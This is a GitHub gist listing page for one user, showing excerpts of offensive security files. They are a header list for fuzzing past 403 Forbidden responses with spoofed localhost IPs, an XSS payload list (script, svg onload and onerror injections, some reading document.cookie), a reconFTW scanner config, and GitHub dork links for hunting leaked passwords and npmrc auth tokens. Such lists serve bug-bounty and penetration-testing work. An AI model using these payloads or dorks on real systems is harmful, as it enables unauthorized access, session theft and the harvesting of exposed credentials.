Error Exploit MU2324
MU2324
/ 403-Bypass-Headers-List.txt
Created
October 27, 2024 15:08
— forked from Spix0r/403-Bypass-Headers-List.txt
I’ve analyzed numerous tools, blogs, tweets, and other resources on bypassing 403 Forbidden errors using HTTP Headers Fuzzing techniques. After extensive research, I’ve compiled a list of headers you can fuzz to potentially bypass 403 restrictions.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Allow: CONNECT | |
| Allow: GET | |
| Allow: HEAD | |
| Allow: POST | |
| Allow: TRACE | |
| Client-IP: 0 | |
| Client-IP: 0177.0000.0000.0001 | |
| Client-IP: 0x7F000001 | |
| Client-IP: 10.0.0.0 | |
| Client-IP: 10.0.0.1 |
MU2324
/ xss1500.txt
Created
July 27, 2024 06:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #<script>alert(1)</script> | |
| 1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus= | |
| "><form onformdata%3Dwindow.confirm(cookie)><button>XSS here<!-- | |
| #javascript:alert(2); | |
| "><svg onload=alert(1)> | |
| [email protected]%27\%22%3E%3Csvg/onload=alert(/xss/)%3E | |
| [email protected]%2527%5C%2522%253E%253Csvg%2Fonload%3Dalert%28%2Fxss%2F%29%253E | |
| //?aspxerrorpath=<script>alert(1)</script> | |
| 嘼嘾img%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3B%3E | |
| alert##<script>prompt(1234)</script> |
MU2324
/ reconftw.cfg
Created
November 22, 2023 14:32
— forked from jhaddix/reconftw.cfg
reconFTW config file: NO google/osint, wordlist creation, nuclei js analysis
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################################################################# | |
| # reconFTW config file # | |
| ################################################################# | |
| # General values | |
| tools=~/Tools # Path installed tools | |
| SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" # Get current script's path | |
| profile_shell=".$(basename $(echo $SHELL))rc" # Get current shell profile | |
| reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) # Fetch current reconftw version | |
| generate_resolvers=false # Generate custom resolvers with dnsvalidator |
MU2324
/ Github Dorks
Last active
November 22, 2023 14:33
— forked from jhaddix/Github Dorks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "" | |
| echo "************ Github Dork Links (must be logged in) *******************" | |
| echo "" | |
| echo " password" | |
| echo "https://github.com/search?q="hackertarget.site"+password&type=Code" | |
| echo "https://github.com/search?q=""hackertarget""+password&type=Code" | |
| echo "" | |
| echo " npmrc _auth" |